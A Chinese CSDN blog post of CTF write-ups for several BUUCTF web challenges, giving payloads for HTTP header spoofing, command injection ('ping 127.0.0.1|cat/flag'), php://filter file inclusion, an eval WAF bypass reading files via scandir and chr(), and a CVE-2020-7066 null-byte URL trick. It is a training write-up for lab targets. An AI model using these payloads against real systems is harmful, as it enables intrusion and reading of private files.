CTF

最新推荐文章于 2022-08-23 09:56:33 发布
最新推荐文章于 2022-08-23 09:56:33 发布
阅读量486 收藏 2
点赞数 1
文章标签: 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50025258/article/details/113503647
版权

[极客大挑战 2019]HTTP

查看源码,发现php文件
href="Secret.php"
BurpSuite抓包
提示:it不是来自https://www.Sycsecret.com
HTTP请求首部字段
Referer:http://www.Sycsecret.com`

作用:告知服务器请求的原始资源的URI

提示:请use"Syclover"浏览器
User-Agent:Syclover

作用:将创建请求的浏览器和用户代理名称等信息传达给服务器

提示:No!!! you can only read this locally!!!
 X-Forwarded-For:127.0.0.1

(非标准首部字段)简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP

得到flag

【buu】[ACTF2020 新生赛]Exec

PING命令

通过发送数据包并接收应答信息来检测两台计算机之间的网络是否连通。

CAT命令

一个文本输出命令,通常是用于观看某个文件的内容。

构造payload如下
ping 127.0.0.1|cat/flag

【buu】[ACTF2020 新生赛]Include

进入题目,看到URL中存在文件包含

/?file=flag.php
php://filter"伪协议

当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。

php://filter 伪协议文件包含读取源代码,加上read=convert.base64-encode (用base64编码输出),不然会直接当做php代码执行,看不到源代码内容。

构造payload
?file=php://filter/read=convert.base64-encode/resource=flag.php
base64解码
<?php
echo "Can you find out the flag?";
//flag{*************************}
?>
flag在注释里

【Buu】[BJDCTF 2nd]elementmaster

查看源码,发现id处是两串十六进制,转换得到:
0x506F2E ==> Po
0x706870 ==> php
访问Po.php文件,没有出现404 Not Found,出现一个点
.
利用python遍历访问所有 元素名.php 文件,将存在文件的内容拼接在一起输出,得到:
And_th3_3LemEnt5_w1LL_De5tR0y_y0u.php
访问获得flag.

【buu】[RoarCTF 2019]Easy Calc

查看源码,发现calc.php文件和提示:
<!--I've set up WAF to ensure security.-->
访问calc.php的源码,显示了waf的过滤规则:
<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
        $str = $_GET['num'];
        $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
        foreach ($blacklist as $blackitem) {
                if (preg_match('/' . $blackitem . '/m', $str)) {
                        die("what are you want to do?");
                }
        }
        eval('echo '.$str.';');
}
?>
利用php和waf对于请求参数解析的差异达到绕过
查看目录
calc.php? num=1;var_dump(scandir(chr(47)))
发现f1agg文件,读取f1agg文件
calc.php? num=1;var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
获得flag.

【buu】[GKCTF 2020]CVE版签到

hint提示cve-2020-7066:

在低于7.2.29的PHP版本7.2.x,低于7.3.16的7.3.x和低于7.4.4的7.4.x中,将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。

打开网页,发现提示:
You just view *.ctfhub.com
结合漏洞和提示,构造url
/?url=http://127.0.0.1%00.ctfhub.com
打开网页,发现提示:
[4] => Tips: Host must be end with '123'
因为提示host必须以123结尾,所以构造新的url
/?url=http://127.0.0.123%00.ctfhub.com
获得flag.
诸葛子龙
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ctf拼图例题-puzzle
04-13
CTF(Capture The Flag)竞赛中,"puzzle"是一种常见的挑战类型,它涉及到解决各种谜题以获取关键信息或解密数据。本资源包包含了一组与CTF拼图相关的图片,很可能是参赛者需要解读的线索。每个图片可能代表一个...
ctf的小博客院子
qq_20086667的博客
08-20 369
就在这编辑了。记得查看哦
CTF:BugkuCTF-web-域名解析
qq_44985415的博客
08-21 1296
BugkuCTF-web-域名解析 域名解析 1.知识点 (1) 域名解析 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站的一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来代替IP地址标识站点地址。域名解析就是域名到IP地址的转换过程。域名的解析工作由DNS服务器完成。 域名解析也叫域名指向、服务器设置、域名配置以及反向IP登记等等。说得简单点就是将好记的域名解析成IP,服务由DNS服务器完成,是把域名解析到一个IP地址,然后在此IP地址的主机上将一个子
【web-ctfctf-pikachu-url重定向
一个努力生活的人的博客
08-23 1328
ctf-pikachu-url重定向
2023陕西CTF部分题目
最新发布
06-08
记一道MISC的题目,群里来的,发现cyberchef新用法
CTF之二维码扫描.7z
12-02
网络安全领域,CTF(Capture The Flag)是一种流行的比赛形式,旨在锻炼和测试参与者的信息安全技能。这个"CTF之二维码扫描.7z"压缩包显然与CTF比赛中的一个环节有关,即二维码扫描。二维码在现代生活中无处不在,...
CTF100题.docx
05-25
CTF是一种流行的信息安全竞赛形式,其英文名可直译为“夺得Flag”,也可意译为“夺旗赛”。其大致流程是,参赛团队之间通过进行攻防对抗、程序分析等形式,率先从主办方给出的比赛环境中得到一串具有一定格式的字符...
CTF概述
博客
07-25 350
不定时更新······ 练习平台 X计划平台 https://www.linkedbyx.com/taskCenter/latest 每月有月赛,可以适应CTF比赛时紧张的节奏。 攻防世界 https://adworld.xctf.org.cn/ 题目比较全面,可以用来日常练习。 学习资料 Getting Started - CTF Wiki https://ctf-wiki.gith...
从零学习CTF
weixin_44147777的博客
12-21 2864
从零学习CTF 本人大一小白一枚,对信息安全颇感兴趣,就将我的学习作为博客。若我日后成为大佬,我的博客是不是也会对以后的小白有所帮助呢,想想都有点小激动,哈哈哈哈。 我是分界线 首先 什么是CTF CTF(夺旗赛)简介: CTF(Capture The Flag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。 竞赛模式 解题模式 攻防模式(A...
20220130---CTF WEB方向---命令执行和URL解码
qq_51550750的博客
01-30 906
CTF WEB方向–攻防世界–新手场–11,12两道题 第11题:command_execution--------题目类型:命令执行 先尝试ping一下127.0.0.1: 根据得到的反馈,估计是windows操作系统。 尝试ls命令: 只有一个index.php 尝试往外:ls …/ 也就是说html目录下有一个index.php文件 再尝试往外读:ls …/…/ 得到很多目录,但是没有要读的flag,所以再往外读: 经过尝试,发现在home 目录下找到了flag.txt 127.
DDCTF2019web----滴~
Superpig的博客
04-28 353
题目链接 题目界面: 首先,观察!! 1、titile和get传送的数据jpg的内容是一样的,而且很像是加密过的字符串 2、img函数提供的参数有提到base64,猜测其后的内容是base64加密的内容 然后,尝试: 1、将jpg后面的内容用base64解密,得到NjY2QzYxNjcyRTZBNzA2Nw== 2、看起来还是像base64加密的内容,再次解密,得到666C61672E6A706...
[极客大挑战 2019]Http1解题思路
Megumiwind的博客
08-08 4081
1.打开Burp suite输入靶机的网址进行抓包,并把抓到的包发送到repeater(重发器)当中 在重发器中先点击发送查看一下结果的网页源代码。 在源码当中发现在一个html语句,并且是a标签的跳转语句,而跳转的地点是secret.php <a style="border:none;cursor:default;" onclick="return false" href="Secret.php">氛围</a> 2.既然是秘密页面,我们当然要进去看一下到底是.
[极客大挑战 2019]Http1(BUCTF在线评测)
邓霖涛的博客
08-10 2536
得到flag{8d8ea9d6-86ae-4f8d-8f8e-e10d4b1bd9ef}you can only read this locally!浏览器修改不了Referer的值,换工具抓包工具(修改浏览器代理到抓包工具)搜索下看看有没有别的链接,如标签,发现有两处a标签,特别是第二处。按提示修改请求头X-Forwarded-For:localhost。鼠标右键发送到重发器修改Referer的值,测试请求。页面a标签包裹的"氛围"二字,可以点击了。F12调试该页面,跟踪该get网络请求。......
BUUCTF - web - PingPingPing+Knife+Http
1tachi的博客
11-02 316
文章目录前言PingPingPing分析构造payload其他方法白给的shellHttpRepeater 前言 已经坚持了半个月了,有十多天一直在写杂项,直到学长委婉地告诉我杂项没啥技术性,就流量分析有点用,建议我学pwn,所以这几天我开始做web了 我会一直坚持下去 加油! PingPingPing 分析 想到昨天做了一个ping加Linux命令,今天这个也可以试试 ?ip=127.0.0.1|ls 尝试拿flag?ip=127.0.0.1|cat flag.php 看来空格被禁了,尝试绕过 换
CTF--WEB--文件上传
yanfangjie的博客
01-06 3750
前端验证 上传一个一句话木马,扩展名改成允许上传的扩展名。 在把.jpg改成.php 上传的路径在这里 我们可以使用蚁剑来连接 连接成功,得到flag
CTF入门
热门推荐
chaoyueziji123的专栏
09-28 5万+
感谢白帽子ADoG A.K.A D3AdCa7 (死猫&霸道总裁)同学的投稿,以下内容供安全爱好者参考学习,本文获得投稿奖励300元,即将打入作者账户,投稿请发送邮件至 huangyuan#360.cn 序 信息安全作为国家越来越重视的领域已经在渐渐起飞,而CTF(Capture the flag)作为信息安全领域选拔人才和互相比拼技能水平的比赛形式,也被越来越多的人所关注,那么作为一
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值